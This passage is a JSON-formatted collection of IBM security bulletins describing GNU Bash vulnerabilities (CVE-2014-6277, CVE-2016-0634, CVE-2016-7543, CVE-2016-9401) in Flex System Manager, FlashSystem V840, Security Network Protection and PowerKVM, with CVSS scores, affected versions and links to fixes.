\nDESCRIPTION:** GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/96687_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n**CVEID:** [_CVE-2016-0634_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0634>)** \nDESCRIPTION:** GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an error related to the expansion of the $HOSTNAME. By injecting the hostname with malicious code, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 4.9 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/121373_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/121373>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [_CVE-2016-7543_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7543>)** \nDESCRIPTION:** GNU Bash could allow a local attacker to execute arbitrary commands on the system. An attacker could exploit this vulnerability using specially crafted SHELLOPTS and PS4 variables to execute arbitrary commands on the system with root privileges. \nCVSS Base Score: 8.4 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/121372_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/121372>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFlex System Manager 1.3.4.0 \nFlex System Manager 1.3.3.0 \nFlex System Manager 1.3.2.1 \nFlex System Manager 1.3.2.0\n\n## Remediation/Fixes\n\nIBM recommends updating the FSM using the instructions referenced in this table. \n \n\n\nProduct | \n\nVRMF | \n\nRemediation \n---|---|--- \n \nFlex System Manager | \n\n1.3.4.0 | \n\nInstall [fsmfix1.3.4.0_IT19262_IT19315_IT19320](<https://www-945.ibm.com/support/fixcentral/systemx/selectFixes?product=ibm%2Fsystemx%2F8731&fixids=fsmfix1.3.4.0_IT19262_IT19315_IT19320&function=fixId&parent=Flex%20System%20Manager%20NodeFlex%20System%20Manager>) \n \nFlex System Manager | \n\n1.3.3.0 | \n\nInstall [fsmfix1.3.3.0_IT19262_IT19315_IT19320](<https://www-945.ibm.com/support/fixcentral/systemx/selectFixes?product=ibm%2Fsystemx%2F8731&fixids=fsmfix1.3.3.0_IT19262_IT19315_IT19320&function=fixId&parent=Flex%20System%20Manager%20NodeFlex%20System%20Manager>) \n \nFlex System Manager | \n\n1.3.2.1 \n1.3.2.0 | \n\nInstall [fsmfix1.3.2.0_IT19262_IT19315_IT19320](<https://www-945.ibm.com/support/fixcentral/systemx/selectFixes?product=ibm%2Fsystemx%2F8731&fixids=fsmfix1.3.2.0_IT19262_IT19315_IT19320&function=fixId&parent=Flex%20System%20Manager%20NodeFlex%20System%20Manager>) \n \nFor all VRMF not listed in this table, IBM recommends upgrading to a fixed and supported version/release of the product. \n \nFor a complete list of FSM security bulletins refer to this technote: [http://www-01.ibm.com/support/docview.wss?uid=nas7797054ebc3d9857486258027006ce4a0&myns=purflex&mync=E&cm_sp=purflex-_-NULL-_-E](<http://www-01.ibm.com/support/docview.wss?uid=nas7797054ebc3d9857486258027006ce4a0&myns=purflex&mync=E&cm_sp=purflex-_-NULL-_-E>)\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n17 March 2017: Original version published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"HW94A\",\"label\":\"Flex System Manager Node\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}]", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T01:35:18", "type": "ibm", "title": "Security Bulletin: IBM Flex System Manager (FSM) is affected by bash vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6277", "CVE-2014-6278", "CVE-2016-0634", "CVE-2016-7543"], "modified": "2018-06-18T01:35:18", "id": "B0A90459D4D8B5BAF4898F53404E42E2AEA4F2105238CC68CC28BCABD00D3FD1", "href": "https://www.ibm.com/support/pages/node/630757", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:15:06", "description": "## Summary\n\nThere are vulnerabilities in GNU Bash to which the IBM FlashSystem\u2122 V840 is susceptible. An exploit of these vulnerabilities (CVE-2016-0634, CVE-2016-7543, CVE-2016-9401) could make the system susceptible to an attack which could allow an attacker to execute arbitrary code and commands on the system or bypass the restricted shell.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-0634_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0634>)\n\n**DESCRIPTION:** GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an error related to the expansion of the $HOSTNAME. By injecting the hostname with malicious code, an attacker could exploit this vulnerability to execute arbitrary code on the system.\n\nCVSS Base Score: 4.9\n\nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/121373_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/121373>) for the current score\n\nCVSS Environmental Score*: Undefined\n\nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [_CVE-2016-7543_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7543>)\n\n**DESCRIPTION:** GNU Bash could allow a local attacker to execute arbitrary commands on the system. An attacker could exploit this vulnerability using specially crafted SHELLOPTS and PS4 variables to execute arbitrary commands on the system with root privileges.\n\nCVSS Base Score: 8.4\n\nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/121372_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/121372>) for the current score\n\nCVSS Environmental Score*: Undefined\n\nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [_CVE-2016-9401_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9401>)\n\n**DESCRIPTION:** GNU Bash could allow a local attacker to bypass security restrictions, caused by a use-after-free error. An attacker could exploit this vulnerability using a specially crafted address to bypass the restricted shell.\n\nCVSS Base Score: 4\n\nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122314_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122314>) for the current score\n\nCVSS Environmental Score*: Undefined\n\nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n## Affected Products and Versions\n\nStorage Node machine type and models (MTMs) affected: 9840-AE1 and 9843-AE1 \n\nController Node MTMs affected: 9846-AC0, 9848-AC0, 9846-AC1, and 9848-AC1 \n\n \n \nSupported storage node code versions which are affected \n\u00b7 VRMFs prior to 1.3.0.9 \n\u00b7 VRMFs prior to 1.4.8.0 \n \nSupported controller node code versions which are affected \n\u00b7 VRMFs prior to 7.6.1.9 \n\u00b7 VRMFs prior to 7.7.1.9 \n\u00b7 VRMFs prior to 7.8.1.6 \n\u00b7 VRMFs prior to 8.1.0.0 \n\n## Remediation/Fixes\n\n_MTMs_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n**Storage nodes:** \n9846-AE1 & \n9848-AE1 \n \n**Controller nodes:** \n9846-AC0, \n9846-AC1, \n9848-AC0, & \n9848-AC1| _Code fixes are now available, the minimum VRMF containing the fix depends on the code stream:__ _ \n__Fixed Code VRMF __ \n_1.5 stream: 1.5.0.0_ \n_1.4 stream: 1.4.8.0 _ \n_1.3 stream: 1.3.0.9_ \n \n__Controller Node VRMF __ \n_8.1 stream: 8.1.0.0_ \n_7.8 stream: 7.8.1.6_ \n_7.7 stream: 7.7.1.9_ \n_7.6 stream: 7.6.1.9_| _ __N/A_| [**_FlashSystem V840 fixes_**](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%2Bhigh%2Bavailability%2Bsystems&product=ibm/StorageSoftware/IBM+FlashSystem+V840&release=1.0&platform=All&function=all>)** **for storage and controller node** **are available @ IBM\u2019s Fix Central \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n23 April 2018 Original Version Published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"ST2HTZ\",\"label\":\"IBM FlashSystem Software\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"Security Bulletin\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}]", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T00:51:29", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in GNU Bash affect the IBM FlashSystem model V840", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401"], "modified": "2018-06-18T00:51:29", "id": "CD0F80B60649CBD9C4C6A1FFBD3F93A56B14F83A3755904C4DD84AC6E8B6719B", "href": "https://www.ibm.com/support/pages/node/650915", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T21:59:42", "description": "## Summary\n\nSecurity vulnerabilities have been discovered in GNU Bash, which is used by IBM Security Network Protection. IBM Security Network Protection has addressed the applicable CVEs.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-0634_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0634>)** \nDESCRIPTION:** GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an error related to the expansion of the $HOSTNAME. By injecting the hostname with malicious code, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 4.9 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/121373_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/121373>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n**CVEID:** [_CVE-2016-7543_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7543>)** \nDESCRIPTION:** GNU Bash could allow a local attacker to execute arbitrary commands on the system. An attacker could exploit this vulnerability using specially crafted SHELLOPTS and PS4 variables to execute arbitrary commands on the system with root privileges. \nCVSS Base Score: 8.4 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/121372_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/121372>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [_CVE-2016-9401_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9401>)** \nDESCRIPTION:** GNU Bash could allow a local attacker to bypass security restrictions, caused by a use-after-free error. An attacker could exploit this vulnerability using a specially crafted address to bypass the restricted shell. \nCVSS Base Score: 4 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122314_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122314>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n## Affected Products and Versions\n\nIBM Security Network Protection 5.3.1 \nIBM Security Network Protection 5.3.3\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_| _Remediation/First Fix_ \n---|---|--- \nIBM Security Network Protection| Firmware version 5.3.1| Download Firmware 5.3.1.14 from [IBM Security License Key and Download Center](<https://ibmss.flexnetoperations.com/control/isdl/home>) and upload and install via the Available Updates page of the Local Management Interface. \nIBM Security Network Protection| Firmware version 5.3.3| Download Firmware 5.3.3.4 from [IBM Security License Key and Download Center](<https://ibmss.flexnetoperations.com/control/isdl/home>) and upload and install via the Available Updates page of the Local Management Interface. \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n31 August 2017: Original Version Published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SSHLHV\",\"label\":\"IBM Security Network Protection\"},\"Business Unit\":{\"code\":\"BU008\",\"label\":\"Security\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF009\",\"label\":\"Firmware\"}],\"Version\":\"5.3.1;5.3.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T21:59:32", "type": "ibm", "title": "Security Bulletin: IBM Security Network Protection is affected by Vulnerabilities in GNU Bash", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401"], "modified": "2018-06-16T21:59:32", "id": "2C836F9CF112063B46AB27968F0F45F13141F45BAA0BB984E47B1D31ECA4B374", "href": "https://www.ibm.com/support/pages/node/560205", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:01:19", "description": "## Summary\n\nPowerKVM is affected by vulnerabilities in GNU Bash. IBM has now addressed these vulnerabilities.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-9401_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9401>)** \nDESCRIPTION:** GNU Bash could allow a local attacker to bypass security restrictions, caused by a use-after-free error. An attacker could exploit this vulnerability using a specially crafted address to bypass the restricted shell. \nCVSS Base Score: 4 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122314_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122314>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n\n**CVEID:** [_CVE-2016-7543_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7543>)** \nDESCRIPTION:** GNU Bash could allow a local attacker to execute arbitrary commands on the system. An attacker could exploit this vulnerability using specially crafted SHELLOPTS and PS4 variables to execute arbitrary commands on the system with root privileges. \nCVSS Base Score: 8.4 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/121372_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/121372>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [_CVE-2016-0634_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0634>)** \nDESCRIPTION:** GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an error related to the expansion of the $HOSTNAME. By injecting the hostname with malicious code, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 4.9 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/121373_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/121373>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nPowerKVM 2.1 and 3.1\n\n## Remediation/Fixes\n\nCustomers can update PowerKVM systems by using \"yum update\". \n\nFix images are made available via Fix Central. For version 3.1, see [_https://ibm.biz/BdHggw_](<https://ibm.biz/BdHggw>). This issue is addressed starting with v3.1.0.2 update 10.\n\n \n \nFor version 2.1, see [_https://ibm.biz/BdEnT8_](<https://ibm.biz/BdEnT8>). This issue is addressed starting with PowerKVM 2.1.1.3-65 update 19. Customers running v2.1 are, in any case, encouraged to upgrade to v3.1. \n \nFor v2.1 systems currently running fix levels of PowerKVM prior to 2.1.1, please see <http://download4.boulder.ibm.com/sar/CMA/OSA/05e4c/0/README> for prerequisite fixes and instructions. \n\n## Workarounds and Mitigations\n\nnone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n10 August 2017 - Initial Version\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"SSZJY4\",\"label\":\"PowerKVM\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.1;3.1\",\"Edition\":\"KVM\",\"Line of Business\":{\"code\":\"LOB08\",\"label\":\"Cognitive Systems\"}}]", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.4, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T01:37:30", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in GNU Bash affect PowerKVM", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, 